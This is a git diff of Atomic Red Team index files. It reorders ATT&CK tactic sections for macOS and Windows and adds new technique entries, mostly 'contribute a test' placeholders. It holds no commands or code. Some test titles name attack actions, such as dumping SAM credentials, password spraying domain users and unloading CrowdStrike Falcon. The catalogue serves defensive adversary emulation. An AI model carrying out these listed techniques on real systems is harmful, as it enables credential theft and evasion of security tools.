[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.004 Drive-by Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.003 Install Digital Certificate [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.005 Link Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -470,7 +502,10 @@ - T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -590,14 +625,21 @@ - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - Atomic Test #1: At - Schedule a job [linux] - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1609 Container Administration Command](../../T1609/T1609.md) + - Atomic Test #1: ExecIntoContainer [linux, macos] +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- T1610 Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index ebfb40df..baee6de3 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -1,118 +1,4 @@ # macOS Atomic Tests by ATT&CK Tactic & Technique -# privilege-escalation -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] -- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.014 Emond](../../T1546.014/T1546.014.md) - - Atomic Test #1: Persistance with Event Monitor - emond [macos] -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) - - Atomic Test #1: Launch Agent [macos] -- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) - - Atomic Test #1: Launch Daemon [macos] -- [T1053.004 Launchd](../../T1053.004/T1053.004.md) - - Atomic Test #1: Event Monitor Daemon Persistence [macos] -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) - - Atomic Test #1: Logon Scripts - Mac [macos] -- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) - - Atomic Test #1: Plist Modification [macos] -- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - - Atomic Test #1: rc.common [macos] -- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - - Atomic Test #1: Re-Opened Applications [macos] - - Atomic Test #2: Re-Opened Applications [macos] -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - - Atomic Test #1: Make and modify binary from C source [macos, linux] - - Atomic Test #2: Set a SetUID flag on file [macos, linux] - - Atomic Test #3: Set a SetGID flag on file [macos, linux] -- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) - - Atomic Test #1: Add file to Local Library StartupItems [macos] -- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - - Atomic Test #1: Sudo usage [macos, linux] - - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] - - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - -# persistence -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] - - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] - - Atomic Test #3: Firefox [linux, windows, macos] - - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] -- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] -- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.014 Emond](../../T1546.014/T1546.014.md) - - Atomic Test #1: Persistance with Event Monitor - emond [macos] -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) - - Atomic Test #1: Launch Agent [macos] -- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) - - Atomic Test #1: Launch Daemon [macos] -- [T1053.004 Launchd](../../T1053.004/T1053.004.md) - - Atomic Test #1: Event Monitor Daemon Persistence [macos] -- [T1136.001 Local Account](../../T1136.001/T1136.001.md) - - Atomic Test #2: Create a user account on a MacOS system [macos] -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) - - Atomic Test #1: Logon Scripts - Mac [macos] -- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) - - Atomic Test #1: Plist Modification [macos] -- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - - Atomic Test #1: rc.common [macos] -- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - - Atomic Test #1: Re-Opened Applications [macos] - - Atomic Test #2: Re-Opened Applications [macos] -- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) - - Atomic Test #1: Add file to Local Library StartupItems [macos] -- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - # credential-access - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.003 Bash History](../../T1552.003/T1552.003.md) @@ -126,6 +12,7 @@ - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) - Atomic Test #2: Search macOS Safari Cookies [macos] - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - Atomic Test #1: AppleScript - Prompt User for Password [macos] - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -139,6 +26,7 @@ - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.004 Private Keys](../../T1552.004/T1552.004.md) @@ -148,6 +36,7 @@ - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # collection @@ -183,6 +72,61 @@ - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# privilege-escalation +- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] +- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.014 Emond](../../T1546.014/T1546.014.md) + - Atomic Test #1: Persistance with Event Monitor - emond [macos] +- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) + - Atomic Test #1: Launch Agent [macos] +- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) + - Atomic Test #1: Launch Daemon [macos] +- [T1053.004 Launchd](../../T1053.004/T1053.004.md) + - Atomic Test #1: Event Monitor Daemon Persistence [macos] +- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) + - Atomic Test #1: Logon Scripts - Mac [macos] +- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) + - Atomic Test #1: Plist Modification [macos] +- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #1: rc.common [macos] +- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) + - Atomic Test #1: Re-Opened Applications [macos] + - Atomic Test #2: Re-Opened Applications [macos] +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) + - Atomic Test #1: Make and modify binary from C source [macos, linux] + - Atomic Test #2: Set a SetUID flag on file [macos, linux] + - Atomic Test #3: Set a SetGID flag on file [macos, linux] +- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) + - Atomic Test #1: Add file to Local Library StartupItems [macos] +- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) + - Atomic Test #1: Sudo usage [macos, linux] + - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] + - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # defense-evasion - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md) @@ -197,6 +141,7 @@ - [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) - Atomic Test #1: rm -rf [macos, linux] - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1027.004 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -209,6 +154,7 @@ - Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -341,6 +287,7 @@ - [T1083 File and Directory Discovery](../../T1083/T1083.md) - Atomic Test #3: Nix File and Diectory Discovery [macos, linux] - Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux] +- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1087.001 Local Account](../../T1087.001/T1087.001.md) - Atomic Test #2: View sudoers access [linux, macos] - Atomic Test #3: View accounts with UID 0 [linux, macos] @@ -376,6 +323,7 @@ - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #7: Hostname Discovery [linux, macos] - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux] +- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #3: System Network Configuration Discovery [macos, linux] - Atomic Test #8: List macOS Firewall Rules [macos] @@ -387,6 +335,69 @@ - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# persistence +- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1176 Browser Extensions](../../T1176/T1176.md) + - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] + - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] +- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] +- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.014 Emond](../../T1546.014/T1546.014.md) + - Atomic Test #1: Persistance with Event Monitor - emond [macos] +- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) + - Atomic Test #1: Launch Agent [macos] +- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) + - Atomic Test #1: Launch Daemon [macos] +- [T1053.004 Launchd](../../T1053.004/T1053.004.md) + - Atomic Test #1: Event Monitor Daemon Persistence [macos] +- [T1136.001 Local Account](../../T1136.001/T1136.001.md) + - Atomic Test #2: Create a user account on a MacOS system [macos] +- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) + - Atomic Test #1: Logon Scripts - Mac [macos] +- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) + - Atomic Test #1: Plist Modification [macos] +- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #1: rc.common [macos] +- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) + - Atomic Test #1: Re-Opened Applications [macos] + - Atomic Test #2: Re-Opened Applications [macos] +- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) + - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) + - Atomic Test #1: Add file to Local Library StartupItems [macos] +- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # execution - [T1059.002 AppleScript](../../T1059.002/T1059.002.md) - Atomic Test #1: AppleScript [macos] @@ -396,7 +407,7 @@ - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1569.001 Launchctl](../../T1569.001/T1569.001.md) - Atomic Test #1: Launchctl [macos] - [T1053.004 Launchd](../../T1053.004/T1053.004.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 803162e4..35f36bb9 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -23,6 +23,7 @@ - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - Atomic Test #2: PowerShell - Prompt User for Password [windows] - [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md) @@ -73,12 +74,14 @@ - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) - Atomic Test #1: Brute Force Credentials of all domain users via SMB [windows] - Atomic Test #2: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) [windows] +- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) - Atomic Test #1: Password Spray all Domain Users [windows] - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows] - Atomic Test #3: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows] - [T1552.004 Private Keys](../../T1552.004/T1552.004.md) - Atomic Test #1: Private Keys [windows] +- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] - Atomic Test #2: Registry parse with pypykatz [windows] @@ -89,7 +92,9 @@ - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1555.004 Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # collection - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -149,6 +154,7 @@ - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] - Atomic Test #2: Replace binary of sticky keys [windows] +- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - Atomic Test #1: Install AppInit Shim [windows] @@ -188,13 +194,16 @@ - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] +- T1611 Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) - Atomic Test #1: IFEO Add Debugger [windows] @@ -314,6 +323,7 @@ - Atomic Test #2: Delete System Logs Using Clear-EventLog [windows] - Atomic Test #3: Clear Event Logs via VBA [windows] - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1553.006 Code Signing Policy Modification 